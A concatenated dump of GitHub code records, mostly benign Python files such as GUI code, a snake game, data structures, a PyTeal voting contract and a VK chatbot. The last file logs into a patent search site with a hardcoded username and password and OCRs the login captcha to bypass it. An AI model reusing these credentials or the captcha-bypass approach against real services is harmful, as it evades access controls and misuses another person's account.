ascending=False).head(5))","repo_name":"TapaniAlastalo/data_analytics","sub_path":"data_analytiikka/tehtävät/t3/t3t1.py","file_name":"t3t1.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35299655282","text":"\nimport os\nimport glob\nimport subprocess\n\n\"\"\"\nCreated on Wed Jul 27 20:18:47 2022\n\n@author: Luke Cota\n\nPURPOSE:\n Cleans up all the unnecessary files created by the pdflatex command\n\nINPUTS:\n src = str, Path to folder which is to be cleaned\n\nOUTPUTS:\n NONE\n\nDEPENDENCIES:\n NONE\n\nNOTES:\n Some notes here\n\n VARIABLES (Important non IO variables):\n NONE\n\"\"\"\ndef cleanup(src):\n\n extensions = ['.out', '.aux', '.log', '.toc']\n\n for elem in extensions:\n # match auxiliary files of this extension inside the target folder\n g_cmd = os.path.join(src, f'*{elem}')\n flist = glob.glob(g_cmd)\n for jelem in flist:\n subprocess.run(['rm', jelem])\n\n return\n","repo_name":"lukecota/latex_builder","sub_path":"SRC/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74190549584","text":"\"\"\"\nThis module contains the Window_View superclass for the PySimpleGUI window.\n\nClasses:\n Window_View: The superclass for the PySimpleGUI window.\n\"\"\"\n\n\n# Imports\nimport sys\nsys.dont_write_bytecode = True\nimport PySimpleGUI as sg\n\n\n# Procedures\nclass Window_View():\n \"\"\"\n The superclass for the PySimpleGUI window.\n\n Functions:\n set_theme(): Sets the default PySimpleGUI theme for the program.\n render(): Renders the window.\n accept_input(): Accepts input from the window.\n \"\"\"\n user = None\n view_list = []\n def __init__(self):\n self.window = None\n self.current_layout = []\n self.components = {\"has_components\":False}\n self.controls = []\n Window_View.view_list += [self]\n \n\n def set_theme():\n \"\"\"\n This function sets the default PySimpleGUI theme for the program.\n \"\"\"\n sg.SetOptions(\n background_color='#95D0B3', \n text_element_background_color='#95D0B3',\n text_color=\"#2D6A4F\",\n font='Any 12',\n element_background_color='#D0E9DD',\n input_elements_background_color='#F7F3EC',\n button_color=('white','#2D6A4F'),\n titlebar_background_color='red',\n titlebar_text_color='black'\n )\n\n\n def render(self):\n \"\"\"\n This function renders the window.\n \"\"\"\n # create the form and show it without the plot\n if self.current_layout != []:\n self.window = sg.Window('Data Scout: Data Set Explorer', self.current_layout, size=(1000, 600), finalize=True)\n \n\n # class static method, level reading\n def accept_input():\n \"\"\"\n This function accepts input from the window.\n \"\"\"\n keep_going = True \n active_view = None \n while keep_going:\n # print(\"----- New Loop -----\")\n window, event, values = sg.read_all_windows()\n # print(\"event: \", event)\n # Find class from window\n for view in Window_View.view_list:\n if view.window == window:\n active_view = view\n # Active view is the window that the event came from\n # Check for window close\n if event == sg.WIN_CLOSED or event == 'Exit':\n keep_going = False\n for accept_control in active_view.controls:\n # Determine loop and handle event\n keep_going = accept_control(event, values, active_view) \n if active_view != None:\n 
active_view.window.refresh()\n","repo_name":"Jayden-Htn/SDV602-Milestone-3","sub_path":"view/window_view.py","file_name":"window_view.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2756939060","text":"class No:\n def __init__(self, valor):\n self.valor = valor\n self.proximo = None\n\n\ndeque = None\n\n\ndef inserir(n, posicao):\n global deque\n if deque == None:\n deque = No(n)\n else:\n if posicao == 'inicio':\n novoItem = No(n)\n novoItem.proximo = deque\n deque = novoItem\n else:\n indice = deque\n while indice.proximo != None:\n indice = indice.proximo\n indice.proximo = No(n)\n\n\ndef remover(posicao):\n global deque\n if deque == None:\n print('Empty deque')\n else:\n if posicao == 'inicio':\n deque = deque.proximo\n else:\n indiceAnt = deque\n indice = deque\n while indice.proximo != None:\n indiceAnt = indice\n indice = indice.proximo\n\n indiceAnt.proximo = indice.proximo\n indice.proximo = None # free\n\n\ndef imprimeDeque(prefixo, deque):\n print('%s[ ' % prefixo, end='')\n\n aux = deque\n while aux != None:\n if aux.proximo == None:\n print('%d ' % aux.valor, end='')\n else:\n print('%d, ' % aux.valor, end='')\n aux = aux.proximo\n\n print(']')\n\n\n# Main\n\n# Test insertions\nfor valor, posicao in [(2, 'inicio'), (3, 'final'), (4, 'final'), (1, 'inicio')]:\n inserir(valor, posicao)\n imprimeDeque('inserir(%d, %s) \t= ' % (valor, posicao), deque)\n\nimprimeDeque('deque = ', deque)\n\n# Test removals\nfor posicao in ['inicio', 'final', 'final', 'inicio', 'inicio', 'final']:\n remover(posicao)\n imprimeDeque('remover(%s) = ' % posicao, deque)\n\nimprimeDeque('deque = ', deque)\n","repo_name":"ufr-si/ed2020-2","sub_path":"Monitoria/Lista Prática da Unidade III/ex06.py","file_name":"ex06.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34521615900","text":"def toArchitectScale(value):\n whole = 0\n # use the length of the value's string form as the rounding precision\n sig = 
len(str(value))\n \n while value > 1:\n value -= 1\n whole += 1\n value = value*10\n value8 = value*0.8\n value16 = value*1.6\n return (whole, round(value8, sig), round(value, sig), round(value16, sig))\n\n\nx,y,z,t = toArchitectScale(1.33)\nprint( '{0} {1}/8 {0} {2}/10 {0} {3}/16'.format(x,y,z,t))\n","repo_name":"QuantumNovice/PyMathematics","sub_path":"Inch to Architect Scale.py","file_name":"Inch to Architect Scale.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"11279179316","text":"import pygame\r\nimport random\r\n\r\npygame.init()\r\n\r\n# Set up the screen dimensions\r\nWIDTH, HEIGHT = 800, 600\r\nGRID_SIZE = 20\r\nGRID_WIDTH = WIDTH // GRID_SIZE\r\nGRID_HEIGHT = HEIGHT // GRID_SIZE\r\n\r\n# Colors\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\n\r\n# Snake direction\r\nUP = (0, -1)\r\nDOWN = (0, 1)\r\nLEFT = (-1, 0)\r\nRIGHT = (1, 0)\r\n\r\n# Initialize the screen\r\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\r\npygame.display.set_caption(\"Snake Game\")\r\n\r\ndef draw_grid():\r\n for x in range(0, WIDTH, GRID_SIZE):\r\n pygame.draw.line(screen, WHITE, (x, 0), (x, HEIGHT))\r\n for y in range(0, HEIGHT, GRID_SIZE):\r\n pygame.draw.line(screen, WHITE, (0, y), (WIDTH, y))\r\n\r\ndef draw_snake(snake):\r\n for segment in snake:\r\n pygame.draw.rect(screen, WHITE, (segment[0] * GRID_SIZE, segment[1] * GRID_SIZE, GRID_SIZE, GRID_SIZE))\r\n\r\ndef draw_apple(apple):\r\n pygame.draw.rect(screen, RED, (apple[0] * GRID_SIZE, apple[1] * GRID_SIZE, GRID_SIZE, GRID_SIZE))\r\n\r\ndef get_random_position():\r\n return random.randint(0, GRID_WIDTH - 1), random.randint(0, GRID_HEIGHT - 1)\r\n\r\ndef main():\r\n snake = [(GRID_WIDTH // 2, GRID_HEIGHT // 2)]\r\n snake_direction = RIGHT\r\n\r\n apple = get_random_position()\r\n\r\n clock = pygame.time.Clock()\r\n\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_UP and snake_direction != DOWN:\r\n snake_direction = UP\r\n elif event.key == pygame.K_DOWN and snake_direction != UP:\r\n snake_direction = DOWN\r\n elif event.key == pygame.K_LEFT and snake_direction != RIGHT:\r\n snake_direction = LEFT\r\n elif event.key == pygame.K_RIGHT and snake_direction != LEFT:\r\n snake_direction = RIGHT\r\n\r\n # Move the snake\r\n head = (snake[0][0] + snake_direction[0], snake[0][1] + snake_direction[1])\r\n snake.insert(0, head)\r\n\r\n # Check if the snake eats the apple\r\n if tuple(snake[0]) == tuple(apple):\r\n apple = get_random_position()\r\n else:\r\n snake.pop()\r\n\r\n # Check for game over conditions\r\n if snake[0][0] < 0 or snake[0][0] >= GRID_WIDTH or snake[0][1] < 0 or snake[0][1] >= GRID_HEIGHT:\r\n pygame.quit()\r\n quit()\r\n\r\n if snake[0] in snake[1:]:\r\n pygame.quit()\r\n quit()\r\n\r\n # Clear the screen\r\n screen.fill(BLACK)\r\n\r\n # Draw elements\r\n draw_grid()\r\n draw_apple(apple)\r\n draw_snake(snake)\r\n\r\n pygame.display.update()\r\n\r\n # Set the game speed (adjust as needed)\r\n clock.tick(10)\r\n\r\nif __name__ == \"__main__\":\r\n 
main()\r\n","repo_name":"SOWJANYATILLAPUDI/GCC","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25794384261","text":"import os\nimport textwrap\n\n\ndef create_tests():\n \"\"\"Creates a new test for every question that doesn't have one.\n \"\"\"\n\n maths_path = os.path.split(os.getcwd())[0]\n questions_path = os.path.join(maths_path, 'questions')\n tests_path = os.path.join(maths_path, 'questions', 'tests')\n\n irrelevant_tests_files = ['__init__.py', 'question_tester.py']\n irrelevant_parts_files = ['__init__.py', 'relationships.py']\n\n test_files = [filename for filename in os.listdir(tests_path) if filename.endswith('py') and filename not in irrelevant_tests_files]\n question_files = [filename for filename in os.listdir(questions_path) if filename.endswith('py') and filename not in irrelevant_parts_files]\n\n for question_file in question_files:\n module_name = os.path.splitext(question_file)[0]\n test_filename = 'test_' + question_file\n\n if test_filename in test_files:\n continue\n\n new_testfile_path = os.path.join(tests_path, test_filename)\n\n with open(new_testfile_path, 'w') as f:\n test_content = textwrap.dedent('''\\\n from .. import relationships, {module_name}\n from .question_tester import question_tester\n\n\n def test_{module_name}():\n question = relationships.parse_structure({module_name})\n question_tester(question)'''.format(module_name=module_name)\n )\n\n f.write(test_content)\n\n\nif __name__ == '__main__':\n create_tests()\n","repo_name":"nebffa/MathsExams","sub_path":"maths/scripts/make_part_tests.py","file_name":"make_part_tests.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"71207891987","text":"import os\n\nfrom ..unittest import TestCase\n\nimport pycassa\n\nfrom ..pysandraunit import PysandraUnit, PysandraUnitServerError\nfrom utils import CassandraPool\n\n_here = lambda x: os.path.join(os.path.dirname(os.path.abspath(__file__)), x)\n\nclass BasicOperationsTest(TestCase):\n\n def setUp(self):\n self.test_schema_yaml = _here('test_schema.yaml')\n self.test_schema_cql = _here('test_schema.cql')\n\n def test_start_clean_stop_no_schema(self):\n p = PysandraUnit()\n p.start()\n p.clean()\n p.stop()\n\n def test_start_clean_connect_stop(self):\n p = PysandraUnit(self.test_schema_yaml)\n servers = p.start()\n\n cp = CassandraPool('testks', servers)\n cp.cf_connect('ascii')\n\n p.clean()\n p.stop()\n\n def test_specify_rpc_port(self):\n port = 9999\n host = 'localhost:%s' % port\n\n p = PysandraUnit(self.test_schema_yaml, rpc_port=port)\n servers = p.start()\n\n self.assertEqual(servers[0], host)\n\n cp = CassandraPool('testks', [host])\n cp.cf_connect('ascii')\n\n p.stop()\n\n\n def test_double_start(self):\n p1 = PysandraUnit()\n p2 = PysandraUnit()\n\n p1.start()\n self.assertRaises(PysandraUnitServerError, p1.start)\n self.assertRaises(PysandraUnitServerError, p2.start)\n p1.stop()\n\n p2.start()\n p2.stop()\n\n def test_cql_schema(self):\n port = 9999\n host = 'localhost:%s' % port\n\n p = PysandraUnit(self.test_schema_cql, rpc_port=port)\n servers = p.start()\n\n self.assertEqual(servers[0], host)\n\n cp = CassandraPool('testks', [host])\n cp.cf_connect('ascii')\n\n p.stop()\n\n def test_local_quorum(self):\n p = PysandraUnit(self.test_schema_cql)\n servers = p.start()\n\n cp = CassandraPool('testks', 
servers)\n cf = cp.cf_connect('ascii')\n\n self.assertRaises(pycassa.NotFoundException, cf.get, 'test_key', read_consistency_level=pycassa.ConsistencyLevel.LOCAL_QUORUM)\n\n p.stop()\n","repo_name":"hamaxx/pysandra-unit-python","sub_path":"pysandra-unit-python/pysandraunit/tests/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71635936146","text":"# Test PyTeal Contract\n# Author: Devin Downs\n# Project: GreenHouse Hackathon\n# Date: Summer '22\n\nfrom pyteal import *\n\n\"\"\"\nProposal Program\n@dev: Handles voting between experts on donation proposals\n\"\"\"\n\ndef proposal_approval():\n \n \"\"\"\n Create Global State Arguments\n @dev: Executed when on_creation is called (contract is created)\n \"\"\"\n on_creation = Seq(\n [\n App.globalPut(Bytes(\"Creator\"), Txn.sender()), # Store contract creator address\n Assert(Txn.application_args.length() == Int(13)), # Check we have exactly 4 application args (fail if != 4)\n App.globalPut(Bytes(\"RegBegin\"), Btoi(Txn.application_args[0])),\n App.globalPut(Bytes(\"RegEnd\"), Btoi(Txn.application_args[1])),\n App.globalPut(Bytes(\"VoteBegin\"), Btoi(Txn.application_args[2])),\n App.globalPut(Bytes(\"VoteEnd\"), Btoi(Txn.application_args[3])),\n\n # Experts 1-5, value passed is public address\n App.globalPut(Bytes(\"Expert-1\"), Btoi(Txn.application_args[4])),\n App.globalPut(Bytes(\"Expert-2\"), Btoi(Txn.application_args[5])),\n App.globalPut(Bytes(\"Expert-3\"), Btoi(Txn.application_args[6])),\n App.globalPut(Bytes(\"Expert-4\"), Btoi(Txn.application_args[7])),\n App.globalPut(Bytes(\"Expert-5\"), Btoi(Txn.application_args[8])),\n\n # Organization Addresses\n App.globalPut(Bytes(\"Org_Address_1\"), Btoi(Txn.application_args[9])),\n App.globalPut(Bytes(\"Org_Address_2\"), Btoi(Txn.application_args[10])),\n\n # Organization Allocations\n App.globalPut(Bytes(\"Org_Percent_1\"), Btoi(Txn.application_args[11])),\n App.globalPut(Bytes(\"Org_Percent_2\"), Btoi(Txn.application_args[12])),\n\n Return(Int(1)),\n ]\n )\n\n # Check if the transaction sender is the contract creator\n is_creator = Txn.sender() == App.globalGet(Bytes(\"Creator\"))\n\n # Check if the transaction sender is an expert\n is_expert = Cond(\n [Txn.sender() == App.globalGet(Bytes(\"Expert-1\")), Int(1)],\n [Txn.sender() == App.globalGet(Bytes(\"Expert-2\")), Int(1)],\n [Txn.sender() == App.globalGet(Bytes(\"Expert-3\")), Int(1)],\n [Txn.sender() == App.globalGet(Bytes(\"Expert-4\")), Int(1)],\n [Txn.sender() == App.globalGet(Bytes(\"Expert-5\")), Int(1)]\n )\n\n \"\"\"\"\n Optin-In Functionality\n @dev: Called when users opt-in to contract\n @returns: TRUE if current round falls between RegBegin/RegEnd, else FALSE\n \"\"\"\n on_register = Return(\n And(\n Global.round() >= App.globalGet(Bytes(\"RegBegin\")),\n Global.round() <= App.globalGet(Bytes(\"RegEnd\")),\n )\n )\n\n\n \"\"\"\n Close Out Functionality\n @dev: Called when users want to remove smart contract from balance record\n Records the users vote, and adds this to the global state\n @return: TRUE if user successfully closes out\n \"\"\"\n get_vote_of_sender = App.localGetEx(Int(0), App.id(), Bytes(\"voted\"))\n\n on_closeout = Seq(\n [\n get_vote_of_sender,\n If(\n And(\n Global.round() <= App.globalGet(Bytes(\"VoteEnd\")), # voting is still allowed\n get_vote_of_sender.hasValue(), # user has voted\n ),\n App.globalPut(\n get_vote_of_sender.value(),\n 
App.globalGet(get_vote_of_sender.value()) - Int(1),\n ),\n ),\n Return(Int(1)),\n ]\n )\n\n\n\n \"\"\"\n Voting Functionality\n @dev: allows the user vote to be stored in global state\n @returns: TRUE if user passes ASSERTS and vote is tallied\n FALSE if voting has ended or user already voted\n \"\"\"\n choice = Txn.application_args[1]\n choice_tally = App.globalGet(choice)\n on_vote = Seq(\n [\n Assert(\n And(\n Global.round() >= App.globalGet(Bytes(\"VoteBegin\")), # Check if current round is within the voting period\n Global.round() <= App.globalGet(Bytes(\"VoteEnd\")),\n is_expert\n )\n ),\n get_vote_of_sender, # Check if user already voted\n If(get_vote_of_sender.hasValue(), Return(Int(0))),\n App.globalPut(choice, choice_tally + Int(1)),\n App.localPut(Int(0), Bytes(\"voted\"), choice),\n Return(Int(1)),\n ]\n )\n\n\n\n \"\"\"\n Payment Functionality\n @dev: Once a proposal has passed, we send the two \n organizations the amount of Algo voted on\n \"\"\"\n on_passed = Seq(\n [\n Assert(And(\n App.globalGet(Bytes(\"Org_Address_1\")).hasValue(),\n App.globalGet(Bytes(\"Org_Address_2\")).hasValue(),\n App.globalGet(Bytes(\"Org_Percent_1\")).hasValue(),\n App.globalGet(Bytes(\"Org_Percent_2\")).hasValue()\n )),\n Seq([\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields({\n TxnField.type_enum: TxnType.Payment,\n TxnField.receiver: Substring(App.globalGet(Bytes(\"Org_Address_1\")), Int(0), Int(32)),\n TxnField.amount: Btoi(Substring(App.globalGet(Bytes(\"Org_Percent_1\")), Int(32), Int(40)))\n }),\n InnerTxnBuilder.Submit(),\n ]),\n Seq([\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields({\n TxnField.type_enum: TxnType.Payment,\n TxnField.receiver: Substring(App.globalGet(Bytes(\"Org_Address_2\")), Int(0), Int(32)),\n TxnField.amount: Btoi(Substring(App.globalGet(Bytes(\"Org_Percent_2\")), Int(32), Int(40)))\n }),\n InnerTxnBuilder.Submit(),\n ])\n ])\n\n\n\n \"\"\"\n OnComplete Conditions\n @dev: Checks all conditions in 'Cond()' before executing\n \"\"\"\n program = Cond(\n [Txn.application_id() == Int(0), on_creation],\n [Txn.on_completion() == OnComplete.DeleteApplication, Return(is_creator)],\n [Txn.on_completion() == OnComplete.UpdateApplication, Return(is_creator)],\n [Txn.on_completion() == OnComplete.CloseOut, on_closeout],\n [Txn.on_completion() == OnComplete.OptIn, on_register],\n [Txn.application_args[0] == Bytes(\"vote\"), on_vote],\n [Txn.application_args[0] == Bytes(\"\"), on_passed]\n )\n return program\n\n\n\n\n\"\"\"\nClear State Program\n@dev: Used only for clearing local user state \n\"\"\"\ndef clear_state_program():\n get_vote_of_sender = App.localGetEx(Int(0), App.id(), Bytes(\"voted\"))\n program = Seq(\n [\n get_vote_of_sender,\n If(\n And(\n Global.round() <= App.globalGet(Bytes(\"VoteEnd\")),\n get_vote_of_sender.hasValue(),\n ),\n App.globalPut(\n get_vote_of_sender.value(),\n App.globalGet(get_vote_of_sender.value()) - Int(1),\n ),\n ),\n Return(Int(1)),\n ]\n )\n\n return program\n\n\n\n# Compilation Helper\nif __name__ == \"__main__\":\n with open(\"proposal_approval.teal\", \"w\") as f:\n compiled = compileTeal(proposal_approval(), mode=Mode.Application, version=5)\n f.write(compiled)\n \n with open(\"vote_clear_state.teal\", \"w\") as f:\n compiled = compileTeal(clear_state_program(), mode=Mode.Application, version=5)\n 
f.write(compiled)","repo_name":"downsd16/TFHExpertAdvisedFund","sub_path":"contracts/proposal_contract.py","file_name":"proposal_contract.py","file_ext":"py","file_size_in_byte":7771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35860380402","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport vk_api\nfrom vk_api.longpoll import VkLongPoll, VkEventType\nfrom random import randint\nfrom response import response\n#import MySQLdb\nimport datetime\nimport requests\nfrom login import isLogin, isAdmin, login\n#from secret import tokenVK # moved the password to a separate file\nfrom admin import adminresponce\nimport bs4\n\n#from tokens import generateUsers, getTokens\n\nkeyb=\"\"\"{\n \"one_time\": false,\n \"buttons\": [\n [{\n \"action\": {\n \"type\": \"text\",\n \"label\": \"Nice answer!\"\n },\n \"color\": \"positive\"\n },\n {\n \"action\": {\n \"type\": \"text\",\n \"label\": \"Normal answer.\"\n },\n \"color\": \"positive\"\n }],\n [{\n \"action\": {\n \"type\": \"text\",\n \"label\": \"Bad answer!\"\n },\n \"color\": \"default\"\n }]\n ]\n}\"\"\"\n\n\nusernames = dict()\n\ndef get_name(user_id):\n if user_id in usernames:\n return usernames[user_id]\n usernames[user_id] = str(_get_user_name_from_vk_id(user_id))\n return usernames[user_id]\n\n\ndef _get_user_name_from_vk_id(user_id):\n request = requests.get(\"https://vk.com/id\"+str(user_id))\n bs = bs4.BeautifulSoup(request.text, \"html.parser\")\n user_name = str(bs.findAll(\"title\")[0])\n user_name = user_name.replace(\"<title>\",\"\")\n return user_name.split()[0]\n\n\ndef main():\n badansw=0\n normalansw=0\n niceansw=0\n print(\"start\")\n\n tok = 'PUT UR VK TOKEN HERE'\n vk_session = vk_api.VkApi(token=tok)\n\n longpoll = VkLongPoll(vk_session)\n vk = vk_session.get_api()\n\n for event in longpoll.listen():\n if event.type == VkEventType.MESSAGE_NEW and event.to_me and event.text:\n text = str(event.text)\n time = str(datetime.datetime.now())\n time = time[:19]\n \n\n if isAdmin(str(event.user_id)):\n try:\n print(str(event.user_id)+\" \"+text)\n res = str(get_name(event.user_id))+\", \"+adminresponce(text)\n vk.messages.send(user_id = event.user_id, message = res, random_id = randint(0, 9999),keyboard=keyb)\n except Exception as e:\n requests.post(\"http://danr0.pythonanywhere.com/api/err/\", data = str(event.user_id)+\"$\"+str(e)+\"$\"+time)\n print(str(e))\n elif isLogin(str(event.user_id)):\n try:\n print(str(event.user_id)+\" \"+text)\n if text == \"Nice answer!\":\n niceansw+=1\n res=\"Already \"+str(niceansw)+\" nice answers\"\n elif text == \"Bad answer!\":\n badansw+=1\n res=\"Already \"+str(badansw)+\" bad answers\"\n elif text == \"Normal answer.\":\n normalansw+=1\n res=\"Already \"+str(normalansw)+\" normal answers\"\n else:\n text = text.replace(\"\\n\",'')\n res = get_name(event.user_id)+\", \"+response(text)# placeholder with standard answers, proper responses will be wired in here later\n vk.messages.send(user_id = event.user_id, message = res, random_id = randint(0, 9999),keyboard=keyb)\n except Exception as e:\n # error logging\n requests.post(\"http://danr0.pythonanywhere.com/api/err/\", data = str(event.user_id)+\"$\"+str(e)+\"$\"+time)\n print(str(e))\n else:\n try:\n res = login(str(event.user_id), text)\n vk.messages.send(user_id = event.user_id, message = res, random_id = randint(0, 9999),keyboard=keyb)\n print(str(event.user_id)+\" \"+text)\n except Exception as e:\n # error logging\n requests.post(\"http://danr0.pythonanywhere.com/api/err/\", data = 
str(event.user_id)+\"$\"+str(e)+\"$\"+time)\n print(str(e))\n\n\nif __name__ == '__main__':\n print(\"start the bot\")\n main()","repo_name":"Danr0/VKbot","sub_path":"project/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71725210706","text":"\"\"\"\nInput: numerator = 2, denominator = 1\nOutput: \"2\"\nExample 3:\n\nInfinitely repeating decimals should be handled like this\nInput: numerator = 2, denominator = 3\nOutput: \"0.(6)\"\n\"\"\"\n\nclass Solution(object):\n def fractionToDecimal(self, numerator, denominator):\n \"\"\"\n :type numerator: int\n :type denominator: int\n :rtype: str\n \"\"\"\n num = numerator\n den = denominator\n\n # denominator is 0\n if not den:\n return\n\n # numerator is 0\n if not num:\n return \"0\"\n\n res = []\n if num * den < 0:\n res.append(\"-\")\n\n num, den = abs(num), abs(den)\n res.append(str(num//den))\n\n # check whether there is a remainder\n rmd = num % den\n\n # if there is no remainder, return the integer result\n if not rmd:\n return \"\".join(res)\n\n # otherwise there is a remainder and we move on to the decimal places\n res.append(\".\")\n\n # remainder -> index in res (counting from the left) where it first appeared\n dic = {}\n\n # while a remainder exists the division is not finished, so keep looping\n while rmd:\n # if this remainder appeared before, we found a repeating decimal, e.g. 1.3333\n if rmd in dic:\n # so wrap the repeating part in res with ( )\n res.insert(dic[rmd], \"(\")\n res.append(\")\")\n break\n\n # record the current remainder and the position where it appeared\n dic[rmd] = len(res)\n # update the dividend\n div = rmd*10 // den\n # update the remainder\n rmd = rmd*10 % den\n res.append(str(div))\n\n\n return \"\".join(res)\n\n\n\"\"\"\nApproach: https://www.youtube.com/watch?v=WJMrceU-ujs\nSolution: https://leetcode.com/problems/fraction-to-recurring-decimal/discuss/51187/Python-easy-to-understand-solution-with-comments.\nSolution:\n\n\"\"\"","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/Math/166.输出递归小数.py","file_name":"166.输出递归小数.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14614668945","text":"################################################################################\n# #\n# Unique Players ZDStack Plugin #\n# #\n# This plugin kicks players with non-unique names. #\n# #\n# Because ZDaemon does not log player IP addresses along with their actions, #\n# if more than one player in a server has the same name, ZDStack can't #\n# discern which of them the action belongs to. This plugin immediately #\n# removes players with non-unique names, ensuring that statistics are #\n# assigned correctly. It is highly recommended that this plugin be enabled #\n# whenever events are enabled (of course, plugins must be enabled as well). #\n# #\n################################################################################\n\nfrom __future__ import with_statement\n\ndef unique_players(event, zserv):\n ###\n # Really, this should monkeypatch PlayersList.add() for every zserv.\n ###\n if not event.type == 'player_lookup':\n return\n reason = \"Player names must be unique, %s is already in use\"\n player_name = event.data['player_name']\n found = False\n with zserv.players.lock:\n for p in zserv.players:\n if p.name == player_name:\n found = found or p.ip\n if p.ip != found:\n ###\n # We don't want to kick players who rejoin while their old\n # connection is timing out... this plugin would kick the\n # actual player and leave the \"ghost\" player. So players\n # with the same name and also the same IP address are\n # allowed. 
Most of the time this shouldn't happen, because\n # PlayersList.add() figures out if a player's reconnected\n # or not already - this is just to be safe.\n #\n # It would be nice if we set a timer on the new player\n # though; if the old player doesn't disconnect in say...\n # 60 seconds, the new player is kicked.\n #\n # At this point, the name is non-unique.\n ###\n zserv.zkick(p.number, reason % (p.name))\n break\n\n","repo_name":"camgunz/zdstack","sub_path":"plugins/unique_players.py","file_name":"unique_players.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"434592117","text":"# -*- coding: utf-8 -*-\r\n# python 3.7.0\r\n#\r\nimport re\r\nimport requests\r\nimport pytesseract\r\nfrom selenium import webdriver\r\nfrom PIL import Image, ImageEnhance\r\nimport time\r\nfrom selenium.webdriver.common.by import By\r\n\r\n\r\ndriver = webdriver.Chrome()\r\ndriver.maximize_window()\r\ndriver.get(\"http://zlxx.gzgs.gov.cn/pubsearch/portal/uilogin-forwardLogin.shtml\")\r\ndriver.implicitly_wait(30)\r\n# username and password\r\ndriver.find_element(by=By.NAME, value='j_username').send_keys('scany_')\r\ndriver.find_element(by=By.ID, value='j_password_show').send_keys('Scany0605!!!')\r\n\r\n# recognise the captcha\r\npic = driver.find_element(by=By.ID, value=\"j_validation_code\")\r\n# clear the captcha input box\r\ndriver.find_element(by=By.ID, value=\"j_validation_code\").clear()\r\n# path where the screenshot / captcha image is saved\r\nscreenImg = r\"E:\\Pic.png\"\r\n# take a screenshot of the browser page\r\ndriver.get_screenshot_as_file(screenImg)\r\n# locate the position and size of the captcha\r\nlocation = driver.find_element(by=By.ID, value='codePic').location\r\nsize = driver.find_element(by=By.ID, value='codePic').size\r\nprint(location, size)\r\n# adjust the crop position based on the screenshot\r\nleft = location['x']+230\r\ntop = location['y']+80\r\nright = location['x'] + size['width']+300\r\nbottom = location['y'] + size['height']+100\r\n# read the screenshot from file and crop out the captcha area\r\nprint(left, top, right, bottom)\r\nimg = Image.open(screenImg).crop((left, top, right, bottom))\r\n# apply some processing to the image\r\nimg = img.convert('RGBA') # convert mode: L | RGB\r\nimg = img.convert('L') # convert mode: L | RGB\r\nimg = ImageEnhance.Contrast(img) # enhance contrast\r\nimg = img.enhance(2.0) # increase saturation\r\nimg.save(screenImg)\r\n# read the image again and recognise the captcha\r\nimg = Image.open(screenImg)\r\ncode = pytesseract.image_to_string(img)\r\n\r\n# strip special characters from the recognised captcha\r\nb = ''\r\nfor i in code.strip():\r\n pattern = re.compile(r'[a-zA-Z0-9]')\r\n m = pattern.search(i)\r\n if m != None:\r\n b += i\r\n\r\n# type the value of b into the captcha input box\r\ndriver.find_element(by=By.ID, value=\"j_validation_code\").send_keys(b)\r\n# click the login button\r\ndriver.find_element(by=By.XPATH, value='//*[@id=\"loginForm\"]/div[5]/a').click()\r\n# wait for 1 second\r\ntime.sleep(1)\r\n# get the cookies and convert them to a string\r\ncookie1 = str(driver.get_cookies())\r\nprint(cookie1)\r\n# use a regex to check whether the cookie contains the word tokenId; if it does, the login succeeded\r\nmatchObj = re.search(r'tokenId', cookie1, re.M | re.I)\r\nprint('login successful')\r\n\r\ndriver.find_element(by=By.XPATH, value='/html/body/div[1]/div/div[2]/ul/li[2]/a').click()\r\ntime.sleep(1)\r\ndriver.find_element(by=By.XPATH, value='//*[@id=\"radioTypeCongregatePAVIEW\"]').click()\r\ndriver.find_element(by=By.ID, value='search_input').send_keys('huawei')\r\ndriver.find_element(by=By.XPATH, value='//*[@id=\"btn_generalSearch\"]').click()\r\n\r\ntime.sleep(100)\r\n","repo_name":"IcyScany/Python_Project","sub_path":"Web 
